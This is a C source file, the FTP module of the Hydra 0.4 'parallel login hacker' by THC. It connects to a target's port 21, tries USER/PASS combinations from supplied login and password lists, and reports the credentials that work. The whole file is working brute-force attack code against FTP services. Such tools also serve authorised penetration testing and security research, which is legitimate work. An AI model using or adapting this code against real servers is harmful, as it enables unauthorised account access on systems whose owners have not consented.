/* 
 * Hydra 0.4 - a parallel login hacker
 * (c) 2000 by Van Hauser / THC <vh@reptile.rug.ac.be>,
 *             Plasmoid / THC <plasmoid@pimmel.com>
 * The Hacker's Choice - http://www.infowar.co.uk/thc
 */

#include <hydra-mod.h>

extern char *HYDRA_EXIT;
char *fbuf;

int start_ftp(int s, unsigned char options, char *miscptr, FILE * fp)
{
    char *empty = "\"\"";
    char *login, *pass, fbuffer[300];

    if (memcmp(hydra_get_next_pair(), &HYDRA_EXIT, sizeof(HYDRA_EXIT)) ==
	0) return 3;
    if (strlen(login = hydra_get_next_login()) == 0)
	login = empty;
    if (strlen(pass = hydra_get_next_password()) == 0)
	pass = empty;

    snprintf(fbuffer, sizeof(fbuffer), "USER %s\n", login);
    if (hydra_send(s, fbuffer, strlen(fbuffer), 0) < 0) {
	return 1;
    }
    fbuf = hydra_receive_line(s);
    if (fbuf[0] != '3') {
	fprintf(stderr,
		"Error: Not an FTP protocol or service shutdown: %s\n",
		fbuf);
	return (3);
    }
    free(fbuf);

    snprintf(fbuffer, sizeof(fbuffer), "PASS %s\n", pass);
    if (hydra_send(s, fbuffer, strlen(fbuffer), 0) < 0) {
	return 1;
    }
    fbuf = hydra_receive_line(s);
    if (fbuf[0] == '2') {
	hydra_report_found(fp);
	hydra_completed_pair();
	return 1;
    }
    free(fbuf);
    hydra_completed_pair();

    return 2;
}

void service_ftp(unsigned long int ip, int sp, unsigned char options,
		 char *miscptr, FILE * fp)
{
    int run = 1, next_run, sock = -1;

    hydra_register_socket(sp);
    while (1) {
	switch (run) {
	case 1:		/* connect and service init function */
	    if (sock >= 0)
		sock = hydra_disconnect(sock);
	    if ((sock = hydra_connect_tcp(ip, 21)) < 0) {
		fprintf(stderr,
			"Error: Child with pid %d terminating, can not connect\n",
			getpid());
		hydra_child_exit();
	    }
	    fbuf = hydra_receive_line(sock);
	    if (fbuf[0] != '2') {	/* check the first line */
		fprintf(stderr,
			"Error: Not an FTP protocol or service shutdown: %s\n",
			fbuf);
		hydra_child_exit();
		exit(-1);
	    }
	    free(fbuf);
	    next_run = 2;
	    break;
	case 2:		/* run the cracking function */
	    next_run = start_ftp(sock, options, miscptr, fp);
	    break;
	case 3:		/* clean exit */
	    if (sock >= 0)
		sock = hydra_disconnect(sock);
	    hydra_child_exit();
	    return;
	default:
	    fprintf(stderr, "Caught unknown return code, exiting!\n");
	    hydra_child_exit();
	    exit(-1);
	}
	run = next_run;
    }
}
